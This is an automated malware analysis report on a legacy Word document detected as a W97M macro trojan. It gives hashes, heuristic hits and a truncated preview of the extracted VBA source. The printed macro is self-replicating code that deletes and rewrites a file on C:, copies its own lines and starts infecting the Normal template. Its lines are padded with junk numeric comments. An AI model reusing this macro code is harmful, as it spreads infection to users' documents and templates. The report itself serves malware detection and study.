Office (OLE) malware analysis — malicious · 303aa963c75aa821

MALICIOUS

Office (OLE)

78.0 KB Created: 2001-02-22 09:52:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 6e6949c17e6f80a8a327f622e7721178 SHA-1: 809f440dc4b5ca03dbd968550f78555f5f337b1b SHA-256: 303aa963c75aa821f71e4eb85af935270c16f52552ad0eefcf353fbb7baf7f93

280 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing VBA macros, as indicated by multiple high-severity heuristics including OLE_VBA_AUTOOPEN, OLE_VBA_DOCOPEN, and OLE_VBA_AUTOCLOSE. The VBA script within 'macros.bas' attempts to delete a file 'c:\cont.dbl' and open a new file with the same name for output, suggesting it is part of a payload delivery or execution chain. The presence of legacy WordBasic auto-exec markers further supports its malicious nature.

Heuristics 6

ClamAV: Win.Trojan.W97M-9 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.W97M-9
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	71030 bytes
SHA-256: `4d6cec0881ddf76eab31f03c450204ef3d593403a7f88d63945c7581cb3bf41c`
Detection ClamAV: Doc.Trojan.Class-15 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Close() '317634377294330679702411,37557275051744E+223176343772943306797024131763437729433067970241 Dim flagaltro As Boolean '13413809124248153858413,32868849009586E+2013413809124248153858411341380912424815385841 Dim count As Integer '28377994413878225445161,1005626000347E+2128377994413878225445162837799441387822544516 Dim bry As Variant '332755970561804414466566,00429687112678E+213327559705618044144665633275597056180441446656 On Error Resume Next '157673226241900907680362,99722246746756E+211576732262419009076803615767322624190090768036 stato = ActiveDocument.Saved '16974400003171604489005,38360832380816E+2016974400003171604489001697440000317160448900 Application.EnableCancelKey = Not -1 '572893799045860269945763,35731231262638E+225728937990458602699457657289379904586026994576 ' .ConfirmConversions = 0 '231818895366185350609001,43388114559268E+222318188953661853506090023181889536618535060900 ' .SaveNormalPrompt = 0 '18343993694519228411,73386012102998E+1818343993694519228411834399369451922841 '268114425642836393260847,60477950019283E+212681144256428363932608426811442564283639326084 Kill "c:\cont.dbl" '73679673600225636449441,66248199470021E+2173679673600225636449447367967360022563644944 Open "c:\cont.dbl" For Output As #1 '5180084960422569150491,16910117022253E+20518008496042256915049518008496042256915049 For count = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines '844286003562365207595561,99691166844511E+228442860035623652075955684428600356236520759556 Next count '693368957613529999630442,44759216412187E+226933689576135299996304469336895761352999963044 Do Until MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(count, 1) = "End Sub" '878132468891511965456001,32770595875367E+228781324688915119654560087813246889151196545600 count = count + 1 '43971154249202327865648,89658978892739E+2043971154249202327865644397115424920232786564 '6375064336230159241001,46727996889993E+20637506433623015924100637506433623015924100 '2357879364660854990411,55821634448416E+20235787936466085499041235787936466085499041 If MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(count, 1) = "Private Sub Document_Open()" Then Exit For '15275476836431937245616,5980473899212E+2015275476836431937245611527547683643193724561 '434843438413728213692811,62118926130874E+224348434384137282136928143484343841372821369281 Print #1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(count, 1) '45270020892057956006099,31637113863953E+2045270020892057956006094527002089205795600609 Loop '487530816015805708503042,83046180400329E+224875308160158057085030448753081601580570850304 Print #1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(count, 1) '838143030493092828014242,59223224463948E+228381430304930928280142483814303049309282801424 '349121751043166324154011,10543263300822E+223491217510431663241540134912175104316632415401 '490910492252081576750491,0218678672392E+224909104922520815767504949091049225208157675049 flagio = False '377085909695752615716002,16923033036485E+223770859096957526157160037708590969575261571600 Set bry = NormalTemplate.VBProject.VBComponents.Item(1) '6585809409800652297645,27294343513498E+20658580940980065229764658580940980065229764 For count = 1 To bry.CodeModule.CountOfLines '125762767364142338321005,20951930590336E+211257627673641423383210012576276736414233832100 flagaltro = True '625650169002151030192641,34579240354932E+226256501690021510301926462565016900215103019264 If Trim(bry.CodeModule.Lines(count + 1, 1)) = "Dim stato As Boolean" Then '51236964003939219274242,01833636142341E+2151236964003939219274 ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.